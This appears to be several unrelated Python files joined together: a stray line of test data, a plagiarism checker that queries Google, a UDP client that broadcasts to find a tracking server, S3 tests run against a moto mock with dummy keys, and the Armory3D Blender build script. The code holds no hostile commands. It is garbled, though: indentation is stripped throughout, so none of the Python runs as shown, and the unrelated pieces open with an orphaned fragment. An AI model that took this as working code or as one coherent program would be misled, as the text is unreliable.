"2\t2\t22\t9223372036854775807\t-2\t2\t22\t18446744073709551615\t-2.2\t2.2\t-2.22\t2.222\t2.2222\t2021-10-07\ttext\tvarchar\tBLOB\t2021-10-07 18:32:57\t2021-10-07 18:32:57.482786\t2021-10-07 18:32:57\t2021-10-07 18:32:57.482786\t11\t22\tvarbinary\tGREEN\n")
|
checker.py
|
import re
import googlesearch
import threading
import time
from PlagiarismChecker.similarity import bagOfWordsSim, substringMatching
def createQueries(text, n_grams=False):
"""Processes the input text and generates queries that will be Googled.
Parameters
----------
text: str
The input text that is to be processed.
n_grams: bool
If True, split the text into fixed-size chunks of nine words instead of splitting it into sentences.
"""
if n_grams:
n = 9
words = text.split(" ")
tokenized_sentences = []
for idx in range(len(words) // n):
tokenized_sentences.append(words[idx * n : (idx + 1) * n])
tokenized_sentences.append(words[(len(words) // n) * n :])
else:
sentenceEnders = re.compile("[.!?]")
sentences = sentenceEnders.split(text)
tokenized_sentences = []
for sentence in sentences:
x = re.compile(r"\W+", re.UNICODE).split(sentence)
x = [ele for ele in x if ele != ""]
tokenized_sentences.append(x)
final_query = []
for sentence in tokenized_sentences:
if sentence:
final_query.append(sentence)
return final_query
def searchGoogle(query, num_results=3):
"""Uses Google Search to fetch urls relevant to the query.
Parameters
----------
query: str
Query to be searched.
num_results: int
Maximum number of result URLs to return.
"""
response = googlesearch.search(
query, tld="com", lang="en", num=num_results, stop=num_results, pause=0
)
urls = []
for url in response:
urls.append(url)
return urls
def PlagCheck(text, n_grams=False):
search_width = 2
queries = createQueries(text, n_grams)
queries = [" ".join(word) for word in queries]
result = []
for query in queries:
start = time.time()
urls = searchGoogle(query, search_width)
match = [False] * len(urls)
jobs = []
for i in range(len(urls)):
if not n_grams:
thr = threading.Thread(
target=substringMatching, args=(query, urls[i], match, i)
)
else:
thr = threading.Thread(
target=bagOfWordsSim, args=(query, urls[i], match, i)
)
jobs.append(thr)
thr.start()
for thr in jobs:
thr.join()
temp_dict = None
for idx in range(len(urls)):
if match[idx]:
temp_dict = {"sentence": query, "match": urls[idx]}
break
if temp_dict:
result.append(temp_dict)
end = time.time()
duration = end - start
if duration < 2:  # throttle so consecutive Google queries are at least ~2 seconds apart
time.sleep(2.1 - duration)
final_result = []
for i in range(len(result)):
if i == 0:
final_result.append(result[i])
elif result[i]["match"] == result[i - 1]["match"]:
final_result[-1]["sentence"] = (
final_result[-1]["sentence"] + result[i]["sentence"]
)
else:
final_result.append(result[i])
return final_result
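# Hedged usage sketch (an addition for illustration, not part of the original module):
# createQueries() is the piece that can be exercised offline. In the default mode it
# yields one token list per sentence; with n_grams=True it yields fixed nine-word chunks
# that PlagCheck later joins back into query strings before Googling them.
if __name__ == "__main__":
    sample = "Plagiarism detection compares documents. It flags text that overlaps with web sources!"
    print(createQueries(sample))                # e.g. [['Plagiarism', 'detection', ...], ['It', 'flags', ...]]
    print(createQueries(sample, n_grams=True))  # nine-word chunks plus the shorter remainder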
|
client.py
|
#!/usr/bin/env python
'''
Machine tracker client. Connects to server and sends
coordinates
'''
import networking as nt
import socket
import threading
import time
import logging
def get_new_data():
return nt.get_ip_address(nt.interface) + ' time is ' + str(time.time())
def discover_server(client_port, got_server_event, end_event, normal_search_time=1,found_search_time=15):
logger = logging.getLogger(__name__)
# Open discovery socket
disc_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
disc_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Get broadcast address
bcast_addr = nt.get_broadcast(nt.interface)
my_ip = nt.get_ip_address(nt.interface)
# Bind to rendezvous port
#disc_socket.bind((bcast_addr,nt.r_port))
#ip,port = disc_socket.getsockname()
message = nt.make_message(nt.client_msg['discovery_request'],(my_ip,client_port))
logger.info('Starting server discover')
while not end_event.isSet():
disc_socket.sendto(message,(bcast_addr,nt.r_port))
logger.debug("Sent discovery request to "+ bcast_addr + ' ' + str(nt.r_port))
if not got_server_event.isSet():
# "Flood" broadcast if we haven't found a server yet
time.sleep(normal_search_time)
else:
# Sleep longer if we already have made a handshake
time.sleep(found_search_time)
return
class main_state_machine():
def search_for_server(self):
self.logger.debug('Search state')
# the timeout should match the search interval used by the discover thread
self.rx_socket.settimeout(self.search_time)
while not self.end_event.isSet():
try:
data = self.rx_socket.recv(1500)
except socket.timeout:
# Try again
continue
# timeout didn't occur
if nt.is_server_discovery_reply(data):
self.got_reply_event.set()
self.server_ip, self.server_port, self.interval = nt.known_msg_parse(data)
return 'connect'
def connect_to_server(self):
self.logger.debug('Connect State')
# Close it if it's open
if self.tx_socket is not None:
self.tx_socket.close()
# Open the socket
self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return 'change'
def send_data(self):
self.logger.debug('Send State')
msg = nt.make_message(nt.client_msg['new_data'],(get_new_data(),))
self.tx_socket.sendto(msg,(self.server_ip,int(self.server_port)))
return 'wait'
def wait_for_interval(self):
self.logger.debug('Wait State')
try:
data = self.rx_socket.recv(1500)
except socket.timeout:
return 'send'
# We got data
if nt.is_server_discovery_reply(data):
self.server_ip, self.server_port, self.interval = nt.known_msg_parse(data)
return 'connect'
elif nt.is_server_interval_change(data):
self.interval = nt.known_msg_parse(data)
return 'change'
elif nt.is_server_refresh(data):
return 'send'
elif nt.is_server_exit(data):
return 'exit'
else:
return 'wait'
def change_interval(self):
self.logger.debug('Interval change state')
self.rx_socket.settimeout(int(self.interval))
return 'wait'
def exit(self):
self.logger.debug('Exit state')
self.end_event.set()
return
def machine(self,initial_state):
self.logger.info('Starting state machine')
# Initial state is search
next_state = initial_state
while not self.end_event.isSet():
next_state = self.state[next_state](self)
self.logger.debug('State machine exiting')
return
def __init__(self,search_time,slow_search_time,end_event):
self.logger = logging.getLogger(__name__)
self.logger.debug('Main Init')
# Open receive socket
self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.rx_socket.bind((nt.get_ip_address(nt.interface),0))
self.rx_port = self.rx_socket.getsockname()[1]
# Set empty TX socket
self.tx_socket = None
self.got_reply_event = threading.Event()
self.end_event = end_event
self.search_time = search_time
self.slow_search_time = slow_search_time
search_thread_args = (self.rx_port,self.got_reply_event,self.end_event,)
search_thread_kwargs = {'normal_search_time':search_time,'found_search_time':slow_search_time}
# Start search
self.search_thread = threading.Thread(target=discover_server,args=search_thread_args,kwargs=search_thread_kwargs)
self.search_thread.start()
self.machine('search')
return
state = {'search':search_for_server,
'connect':connect_to_server,
'send':send_data,
'wait':wait_for_interval,
'change':change_interval,
'exit':exit}
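# Illustrative sketch (an assumption added for clarity, not part of the original client):
# main_state_machine dispatches through the `state` dict above, so every handler simply
# returns the *name* of the next state and machine() keeps looking that name up until
# exit() sets end_event. A stripped-down, self-contained version of the same pattern:
def _state_machine_sketch():
    finished = threading.Event()
    def start_state():
        return 'stop'
    def stop_state():
        finished.set()
        return 'stop'
    states = {'start': start_state, 'stop': stop_state}
    next_state = 'start'
    while not finished.is_set():
        next_state = states[next_state]()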
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(filename)s:%(lineno)s\t%(levelname)s: %(message)s',level=logging.DEBUG)
logger = logging.getLogger(__name__)
logger.warning('test')
# Figure out what interface to use - from the user
nt.interface = 'eth0'
end_event = threading.Event()
try:
main_state_machine(1,15,end_event)
print('Clean exit... Please wait.')
except Exception as e:
logger.error(str(e))
logger.error('Got kill... Please wait 15 seconds.')
end_event.set()
|
test_s3.py
|
import multiprocessing as mp
import os
import pickle
import tempfile
import pytest
from moto import mock_s3
from pfio.v2 import S3, from_url, open_url
from pfio.v2.fs import ForkedError
@mock_s3
def test_s3():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
assert bucket == s3.bucket
assert '/base' == s3.cwd
assert key == s3.aws_access_key_id
assert secret == s3.aws_secret_access_key
assert s3.endpoint is None
with s3.open('foo.txt', 'w') as fp:
fp.write('bar')
assert not fp.closed
with s3.open('foo.txt', 'r') as fp:
assert 'bar' == fp.read()
assert not fp.closed
with s3.open('foo.txt', 'rb') as fp:
assert b'b' == fp.read(1)
assert b'a' == fp.read(1)
assert b'r' == fp.read(1)
assert b'' == fp.read(1)
assert b'' == fp.read(1)
fp.seek(1)
assert b'a' == fp.read(1)
assert b'r' == fp.read(1)
assert b'' == fp.read(1)
assert not fp.closed
assert ['foo.txt'] == list(s3.list())
assert [] == list(s3.list('base'))
assert [] == list(s3.list('base/'))
assert ['foo.txt'] == list(s3.list('/base'))
assert ['foo.txt'] == list(s3.list('/base/'))
assert ['foo.txt'] == list(s3.list(recursive=True))
assert ['base/foo.txt'] == list(s3.list('/', recursive=True))
with s3.open('dir/foo.txt', 'w') as fp:
fp.write('bar')
assert not fp.closed
assert ['dir/', 'foo.txt'] == list(s3.list())
assert not s3.isdir("foo.txt")
assert s3.isdir(".")
assert s3.isdir("/base/")
assert s3.isdir("/base")
assert not s3.isdir("/bas")
def f(s3):
try:
s3.open('foo.txt', 'r')
except ForkedError:
pass
else:
pytest.fail('No Error on Forking')
p = mp.Process(target=f, args=(s3,))
p.start()
p.join()
assert p.exitcode == 0
def g(s3):
try:
with S3(bucket='test-dummy-bucket',
aws_access_key_id=key,
aws_secret_access_key=secret) as s4:
with s4.open('base/foo.txt', 'r') as fp:
fp.read()
except ForkedError:
pytest.fail('ForkedError')
p = mp.Process(target=g, args=(s3,))
p.start()
p.join()
assert p.exitcode == 0
@mock_s3
def test_s3_mpu():
# Test multipart upload
bucket = 'test-mpu'
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True, mpu_chunksize=8*1024*1024,
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
with s3.open('testfile', 'wb') as fp:
for _ in range(4):
fp.write(b"01234567" * (1024*1024))
with s3.open('testfile', 'rb') as fp:
data = fp.read()
assert 8 * 1024 * 1024 * 4 == len(data)
assert b"01234567" == data[:8]
with s3.open('testfile2', 'wb') as fp:
for _ in range(4):
fp.write(b"0123456" * (1024*1024))
with s3.open('testfile2', 'rb') as fp:
data = fp.read()
assert 7 * 1024 * 1024 * 4 == len(data)
assert b"0123456" == data[7:14]
with s3.open('testfile2', 'w') as fp:
for _ in range(4):
fp.write("0123456" * (1024*1024))
with s3.open('testfile2', 'r') as fp:
data = fp.read()
assert 7 * 1024 * 1024 * 4 == len(data)
assert "0123456" == data[7:14]
def touch(s3, path, content):
with s3.open(path, 'w') as fp:
fp.write(content)
assert s3.exists(path)
@mock_s3
def test_s3_recursive():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
touch(s3, 'foo.txt', 'bar')
touch(s3, 'bar.txt', 'baz')
touch(s3, 'baz/foo.txt', 'foo')
assert 3 == len(list(s3.list(recursive=True)))
abspaths = list(s3.list('/', recursive=True))
assert 3 == len(abspaths)
for p in abspaths:
assert p.startswith('base/')
def _seek_check(f):
# Seek by absolute position
###########################
assert f.seek(0, os.SEEK_SET) == 0 and f.read() == b'0123456789'
assert f.seek(5, os.SEEK_SET) == 5 and f.read() == b'56789'
assert f.seek(15, os.SEEK_SET) == 15 and f.read() == b''
with pytest.raises(OSError) as err:
f.seek(-1, os.SEEK_SET)
assert err.value.errno == 22
assert f.tell() == 15, "the position should be kept after an error"
# Relative seek
###############
f.seek(0, os.SEEK_SET) # back to the start
assert f.seek(5, os.SEEK_CUR) == 5
assert f.seek(3, os.SEEK_CUR) == 8
assert f.seek(4, os.SEEK_CUR) == 12
assert f.seek(-1, os.SEEK_CUR) == 11
f.seek(0, os.SEEK_SET)
with pytest.raises(OSError) as err:
f.seek(-1, os.SEEK_CUR)
assert err.value.errno == 22
assert f.tell() == 0, "the position should be kept after an error"
# Seek from the tail
####################
assert f.seek(0, os.SEEK_END) == 10
assert f.seek(-2, os.SEEK_END) == 8
assert f.seek(2, os.SEEK_END) == 12
with pytest.raises(OSError) as err:
f.seek(-11, os.SEEK_END)
assert err.value.errno == 22
assert f.tell() == 12, "the position should be kept after an error"
@mock_s3
def test_s3_seek():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
# Make a 10-bytes test data
touch(s3, 'foo.data', '0123456789')
with open_url('s3://test-dummy-bucket/base/foo.data', 'rb',
aws_access_key_id=key,
aws_secret_access_key=secret) as f:
_seek_check(f)
# Make sure the seek behavior is the same as that of normal file-like objects.
with tempfile.NamedTemporaryFile() as tmpf:
# Make the same 10-bytes test data on local filesystem
with open(tmpf.name, 'wb') as f:
f.write(b'0123456789')
# Open and check its seek behavior is identical
with open(tmpf.name, 'rb') as f:
_seek_check(f)
@mock_s3
def test_s3_pickle():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
with s3.open('foo.pkl', 'wb') as fp:
pickle.dump({'test': 'data'}, fp)
with open_url('s3://test-dummy-bucket/base/foo.pkl', 'rb',
aws_access_key_id=key,
aws_secret_access_key=secret) as f:
assert pickle.load(f) == {'test': 'data'}
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done is not None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
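# Hedged usage sketch (illustrative assumption, not part of the original add-on): run_proc()
# returns the Popen object immediately and fires `done` from a watcher thread once the
# process exits, which is how compile()/build() below chain build steps without blocking
# Blender's UI. The command and callback here are made up purely for demonstration.
def _run_proc_sketch():
    import sys
    def on_done():
        print('child process finished')
    proc = run_proc([sys.executable, '--version'], on_done)
    proc.wait()  # the add-on instead lets the callback drive the next step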
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
wrd = bpy.data.worlds['Arm']
print('\n' + '_' * 10 + ' [Armory] Compiling ' + '_' * 10)
if wrd.arm_verbose_output:
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if not wrd.arm_cache_build:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
# Temporarily link objects from other scenes into a "zoo" collection in the current scene so the depsgraph below covers them
export_coll = bpy.data.collections.new("export_coll")
bpy.context.scene.collection.children.link(export_coll)
for scene in bpy.data.scenes:
if scene == bpy.context.scene: continue
for o in scene.collection.all_objects:
if o.type == "MESH" or o.type == "EMPTY":
if o.name not in export_coll.all_objects.keys():
export_coll.objects.link(o)
depsgraph = bpy.context.evaluated_depsgraph_get()
bpy.data.collections.remove(export_coll) # destroy "zoo" collection
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
ArmoryExporter.export_scene(bpy.context, asset_path, scene=scene, depsgraph=depsgraph)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if not physics_found: # Disable physics if no rigid body is exported
export_physics = False
if not navigation_found:
export_navigation = False
if not ui_found:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
if wrd.arm_verbose_output:
print('Exported modules: ' + str(modules))
print('Shader flags: ' + str(defs))
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() is not None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
if not wrd.arm_verbose_output:
cmd.append("--quiet")
else:
print("Using project from " + arm.utils.get_fp())
print("Running: ", cmd)
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear(clear_warnings=True)
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
    if active_scene.camera is None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
        if text.filepath == '' and text.name.endswith('.hx'):
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
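    """Called when the player process exits."""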
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
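    """Called when khamake finishes converting assets; hands the Haxe
    build over to the compilation server.
    """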
    if state.proc_build is None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
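    """Called when the compilation server finishes the Haxe build;
    swaps the freshly built krom.js.temp in as krom.js.
    """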
    if state.proc_build is None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
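    """Called when the build process exits; reports the result and runs
    the post-build steps on success.
    """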
print('Finished in ' + str(time.time() - profile_time))
if log.num_warnings > 0:
print(f'{log.num_warnings} warnings occurred during compilation!')
if state.proc_build is None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
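    """Re-export the current scene and run an assets-only khamake build
    for live patching in Krom.
    """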
    if state.proc_build is not None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
ArmoryExporter.export_scene(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.extend(('--shaderversion', '330', '--parallelAssetConversion', '4',
'--to', arm.utils.build_dir() + '/debug', '--nohaxe', '--noproject'))
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
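    """Called when a live-patch build finishes; writes an
    iron.Scene.patch() call for the running player to pick up.
    """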
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
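    """Write js to the krom.patch file together with an incrementing patch id."""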
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
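    """Map the selected Armory runtime to a Kha target name."""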
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
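    """Return the path of the JS file generated for the given target."""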
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
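    """Build and run the project in the selected runtime.

    A full recompile is requested only when the build cache is disabled
    or sources, khafile defines or the target changed; otherwise only
    assets are rebuilt.
    """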
global scripts_mtime
wrd = bpy.data.worlds['Arm']
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
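    """Handle a successful build: launch the player for play builds, or
    post-process (minify JS, copy Krom binaries, rename) published
    packages.
    """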
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
